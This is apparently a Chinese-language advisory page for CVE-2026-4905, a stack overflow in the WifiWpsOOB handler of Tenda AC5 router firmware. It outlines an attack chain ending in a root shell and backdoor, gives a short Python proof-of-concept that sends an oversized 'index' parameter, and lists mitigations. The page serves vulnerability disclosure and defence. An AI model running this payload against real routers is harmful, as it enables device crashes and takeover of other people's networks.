IPBUF安全漏洞报告
English
CVE-2026-4905 CVSS 8.8 高危

Tenda AC5 WifiWpsOOB栈缓冲区溢出漏洞(CVE-2026-4905)

披露日期: 2026-03-27
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-4905
漏洞类型
栈缓冲区溢出
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Tenda AC5

相关标签

缓冲区溢出Tenda AC5RCEIoT安全路由器漏洞

漏洞概述

Tenda AC5路由器固件版本15.03.06.47中的/goform/WifiWpsOOB接口存在栈缓冲区溢出漏洞。攻击者可通过构造特制的POST请求,利用index参数触发溢出,导致设备崩溃或执行任意代码,进而完全控制路由器。

技术细节

该漏洞存在于Tenda AC5路由器的POST请求处理函数formWifiWpsOOB中。该函数负责处理/goform/WifiWpsOOB路径的请求。在处理index参数时,代码未对输入数据的长度进行有效校验,直接将其拷贝至栈上的固定大小缓冲区。通过发送超长的index参数,攻击者可以覆盖栈上的返回地址及关键数据。由于该服务监听在网络接口,且无需复杂交互,攻击者可利用此漏洞进行远程代码执行,获得设备的最高控制权。

攻击链分析

STEP 1
侦察阶段
扫描网络环境,识别开放管理端口的Tenda AC5设备,确认固件版本是否为15.03.06.47。
STEP 2
漏洞利用
向目标设备的/goform/WifiWpsOOB接口发送包含恶意index参数的POST请求,触发栈缓冲区溢出。
STEP 3
代码执行
通过精心构造的溢出数据覆盖返回地址,劫持程序控制流,使其跳转至注入的Shellcode执行恶意指令。
STEP 4
建立控制
获取路由器的Root权限Shell,安装后门或修改配置,实现对设备的持久化控制。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(target_ip): url = f"http://{target_ip}/goform/WifiWpsOOB" # Constructing a payload to trigger the stack overflow # The specific offset depends on the firmware analysis payload = "A" * 1000 headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (compatible; Exploit/1.0)" } data = { "index": payload } try: response = requests.post(url, data=data, headers=headers, timeout=5) print(f"Request sent to {url}, Status: {response.status_code}") except Exception as e: print(f"Exploit attempt failed: {e}") if __name__ == "__main__": exploit("192.168.0.1")

影响范围

Tenda AC5 15.03.06.47

防御指南

临时缓解措施
在官方发布补丁前,建议用户禁用路由器的WPS功能,并关闭从互联网侧对管理界面的访问。同时,应确保局域网内设备可信,防止内部攻击者利用该漏洞获取路由器控制权。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表